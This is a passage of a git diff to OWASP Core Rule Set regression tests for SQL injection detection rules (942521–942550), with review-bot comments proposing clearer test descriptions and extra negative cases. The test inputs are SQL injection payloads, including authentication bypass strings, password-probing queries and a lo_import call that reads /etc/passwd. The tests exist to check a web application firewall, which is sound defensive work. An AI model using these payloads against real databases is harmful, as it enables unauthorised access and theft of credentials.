test_title: 942521-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and starts_with(password) and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 22 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' 
and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 23 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and lo_get(16400)::text::bool and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_get(16400)::text::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 24 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1'and json_search 
(json_array(password),0b11000010110110001101100,'t_______________')#" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml index c692b1f97..f81b8e311 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml 
@@ -2,162 +2,161 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942522.yaml +rule_id: 942522 tests: - - test_title: 942522-1 + - test_id: 1 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \'or'1 - data: "var=%5C'or'1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \'or'1 + data: "var=%5C'or'1" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 2 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \"or"1 - data: "var=%5C%22or%221" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \"or"1 + data: "var=%5C%22or%221" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 3 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \`or`1 - data: "var=%5C%60or%601" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \`or`1 + data: "var=%5C%60or%601" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 4 desc: "Blocks bypass with: \\'and" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'and" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C'and" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 5 desc: "Negative test: doesn't block normal SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='or'1" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='or'1" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 6 desc: "Negative test: doesn't block escaped quotes without following (and|or)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C' foo or" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C' foo or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 7 desc: "New line bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=newline%0A%5C' and 1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=newline%0A%5C' and 1" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 8 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20
age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + 
port: 80 + uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and
%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 9 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942522" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml index eb9af879b..0fc688711 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml @@ -2,23 +2,22 @@ meta: author: "Franziska Bühler, azurit" description: "Detects SQL query termination" - enabled: true - name: 942530.yaml +rule_id: 942530 tests: - - test_title: 942530-1 + - test_id: 1 desc: "Detects SQL query termination with ';" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin@juice-sh.op';&password=foo" - version: HTTP/1.0 - output: - log_contains: id "942530" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin@juice-sh.op';&password=foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942530] 
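Review bot: Tests 1–3 carry the identical `desc: "Blocks bypass with escaped quotes"`, and the only thing that distinguishes the three variants is a YAML comment (`# \'or'1`, `# \"or"1` and the backtick counterpart); go-ftw prints `desc` in its failure output, so a regression in, say, the backtick case cannot be identified from a `--show-failures-only` run without opening the file. Folding the variant into the description — `desc: "Blocks bypass with escaped single quote (\\'or'1)"`, `desc: "Blocks bypass with escaped double quote (\\\"or\"1)"` and the same pattern for the backtick case — makes the run output self-explaining and keeps the comments optional. The hunk spans the whole test list; `meta` begins at its first line and nothing of the file after `test_id: 9` is visible.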
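Review bot: The only stage is a positive case, so there is no negative test guarding 942530 against benign input; the neighbouring 942540 file carries balanced-quote false-positive cases, but nothing here pins what this rule must not match. A cheap second stage with `no_expect_ids: [942530]` posting a value where the quote and the semicolon land in different arguments, e.g. `data: "email=o'neil&note=done;"`, would do that — verify the expected outcome against the rule's regex first, since the rule text is not visible here and the payload is only a candidate. The hunk is the whole file body from `meta` onward.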
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
index 97d543f83..ad78ed7d5 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
@@ -2,135 +2,134 @@ meta: author: "karelorigin, Walter Hop, azurit" description: Various Authentication bypass tests - enabled: true - name: 942540.yaml +rule_id: 942540 tests: - - test_title: 942540-1 + - test_id: 1 desc: "Positive test for single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op';" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op';" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 2 desc: "Positive test for double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op\";" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op\";" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 3 desc: "Positive test for backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op`;" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op`;" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 4 desc: "False positive test CSV balanced single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='foo';'bar';'def'" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='foo';'bar';'def'" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942540] + - test_id: 5 desc: "False positive test balanced backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=`foo`;`bar`;`def`" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=`foo`;`bar`;`def`" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942540] + - test_id: 6 desc: "False positive test (markdown) mixed and balanced quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Content-Type: "multipart/form-data; boundary=--------397236876" - method: POST - port: 80 - uri: "/post" - data: | - ----------397236876 - Content-Disposition: form-data; name="document"; filename="document.md" - Content-Type: text/markdown + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: "multipart/form-data; boundary=--------397236876" + method: POST + port: 80 + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="document"; filename="document.md" + Content-Type: text/markdown - # Foo - my name is 'foo'; and I work on CRS. - # Bar - my name is "bar"; and I work on CRS. - ----------397236876-- - version: "HTTP/1.1" - output: - no_log_contains: id "942540" - - test_title: 942540-7 + # Foo + my name is 'foo'; and I work on CRS. + # Bar + my name is "bar"; and I work on CRS. 
+ ----------397236876-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [942540] + - test_id: 7 desc: "Test for bypass with comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" - version: HTTP/1.0 - output: - log_contains: id "942540" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml index f063ea0ed..f6691e602 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml 
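Review bot: The multipart body in test 6 is a `data: |` block scalar, so its lines end in bare LF while the delimiters for the boundary declared in `Content-Type: "multipart/form-data; boundary=--------397236876"` are expected to be CRLF-terminated; unless the harness rewrites line endings, ModSecurity's multipart parser would set `MULTIPART_LF_LINE`, and in a setup that loads modsecurity.conf-recommended the strict-error rule (id 200003) denies in phase 2 before 942540 is evaluated, which makes `no_expect_ids: [942540]` pass vacuously without the rule ever seeing the markdown. A cheap guard is to also assert the body parser did not error, `no_expect_ids: [942540, 200003, 200004]`, or to write the body as a double-quoted scalar with explicit `\r\n` line endings (a rewrite of all nine body lines, so not quoted here). Whether the harness normalises line endings is not visible from this hunk and should be confirmed before choosing. The hunk covers the whole test list; `meta` starts at its first line and nothing else of the file is in view.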
@@ -2,672 +2,671 @@ meta: author: "Andrea Menin (theMiddle), azurit" description: JSON in SQL bypass technique - enabled: true - name: 942550.yaml +rule_id: 942550 tests: - - test_title: 942550-1 + - test_id: 1 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 2 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 